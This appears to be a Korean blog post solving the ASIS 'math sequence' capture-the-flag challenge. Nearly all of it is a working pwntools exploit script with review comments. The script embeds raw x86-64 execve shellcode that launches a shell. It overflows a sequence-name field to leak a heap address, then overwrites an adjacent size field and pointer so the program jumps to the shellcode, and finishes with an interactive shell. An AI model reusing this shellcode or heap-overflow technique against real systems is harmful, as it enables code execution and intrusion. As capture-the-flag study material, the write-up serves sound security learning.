요즘 알고리즘을 공부하느라 해킹 공부를 소홀히 했다 ㅠㅠ 그래서 간만에 풀어본 asis math sequence!! 재밌다 ㅎㅎ
from pwn import *
# Launch the challenge binary locally; every helper below talks to this tube.
s = process("./mathseq")
# NOTE(review): `elf` is loaded but never read anywhere in the visible script.
elf = ELF("./mathseq")
# Raw 27-byte machine-code blob, later stored as the content of the third
# sequence. Its last four bytes (\xb0\x3b\x0f\x05) decode on x86-64 as
# `mov al, 0x3b; syscall`, i.e. an execve call -- presumably a /bin/sh
# launcher; disassemble it yourself before running the script.
shell = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
# NOTE(review): `libc` is likewise loaded but unused in the visible script.
libc = ELF("./libc")
def create(name, size, content):
    """Drive menu option 1 of the target to add a new sequence.

    Args:
        name: Bytes sent verbatim (no newline appended) at the name prompt.
        size: Sequence size; converted with str() and sent as a line.
        content: Bytes sent verbatim (no newline appended) at the
            sequence prompt.

    Uses the module-level tube `s`. Each step waits for the exact prompt
    text before answering, so a changed prompt makes the call block.
    """
    s.sendlineafter("? ", "1")
    s.sendafter("Please enter the sequence name: ", name)
    s.sendlineafter("Please enter the sequence size: ", str(size))
    s.sendafter("Please enter the sequence : ", content)
def edit(index, yes_or_no, name, content):
    """Drive menu option 2 of the target to edit an existing sequence.

    Args:
        index: Entry number; converted with str() and sent as a line.
        yes_or_no: Answer to the "Is it valid(y/n)? " prompt, sent as a line.
        name: New name, sent verbatim (no newline) only when the answer
            is "n".
        content: New sequence data, sent verbatim (no newline) only when
            the answer is "n".

    Uses the module-level tube `s`.
    """
    s.sendlineafter("? ", "2")
    s.sendlineafter("? ", str(index))
    s.sendlineafter("Is it valid(y/n)? ", yes_or_no)
    # NOTE(review): the page lost its indentation; both prompt/response pairs
    # below are assumed to belong to the "n" branch -- confirm against the
    # target's actual dialogue.
    if yes_or_no != "n":
        return
    s.sendafter("Please enter the new sequence name: ", name)
    s.sendafter("Please enter the new sequence : ", content)
def dell(index):
    """Drive menu option 3 of the target for the given entry.

    Args:
        index: Entry number; converted with str() and sent as a line.

    Uses the module-level tube `s`. Not called anywhere in the visible
    script.
    """
    s.sendlineafter("? ", "3")
    s.sendlineafter("? ", str(index))
def prints():
    """Select menu option 4 on the module-level tube `s`.

    The reply is not consumed here; callers read the output themselves.
    """
    s.sendlineafter("? ", "4")
def quit():
    """Select menu option 5 on the module-level tube `s`.

    Note that this definition shadows the interpreter's built-in quit().
    Not called anywhere in the visible script.
    """
    s.sendlineafter("? ", "5")
# Create three entries with 8-byte names and a declared size of 32.
# The third entry's content is the machine-code blob from `shell`.
create("A"*8,32,"1"*8)
create("B"*8,32,"2"*8)
create("C"*8,32,shell)
# Rename entry 2 with a 126-byte name (102 'K' filler + 24 'h' marker),
# far longer than the 8-byte names used at creation. The 'h' run is used
# below to locate the bytes the target prints directly after the name.
pay = "K"*102
pay += "h"*(3*8)
edit(2,"n",pay,"2"*8)
prints()
# Skip output up to the marker, take the next 4 bytes and zero-extend them
# to a 64-bit little-endian integer.
# NOTE(review): recv(4) may return fewer than 4 bytes, in which case u64()
# raises; reading only 4 bytes also assumes the upper bytes of the leaked
# value are zero -- confirm.
# For whoever maintains the target: data showing up after the name in the
# option-4 output suggests the name is stored without a length check or
# terminator, so the print routine runs on into adjacent memory.
s.recvuntil("h"*24)
heap = u64(s.recv(4)+"\x00"*4)
# 0x1190 and (below) 0x1260 are hard-coded offsets, presumably measured by
# the author against this exact binary and allocation order; the page does
# not show how they were obtained.
heap = heap - 0x1190
# Python 2 print statement: the script as written is Python 2 only.
print "heap : " + hex(heap)
# Address at which the author expects the third entry's content to sit.
shell_addr = heap + 0x1260
print "shell : " + hex(shell_addr)
# Second over-long rename, on entry 1: 0x7e filler bytes plus one 0xe0 byte
# as the name, and 24 bytes of content whose last two 8-byte words are 0xa1
# and shell_addr.
# NOTE(review): looks like this replaces a size-like field and a stored
# pointer next to the entry so that the following option-4 call ends up
# using shell_addr -- the target's memory layout is not on the page, so
# confirm in a debugger.
# If control really is transferred to shell_addr, that only works while the
# heap is mapped executable and the edit path does not bound name/content
# lengths; those are the two things to fix on the target side (bounds-check
# the writes, build with a non-executable heap).
edit(1,"n","A"*0x7e+"\xe0","2"*8+p64(0xa1)+p64(shell_addr))
prints()
# Hand the tube over to the terminal for manual interaction.
s.interactive()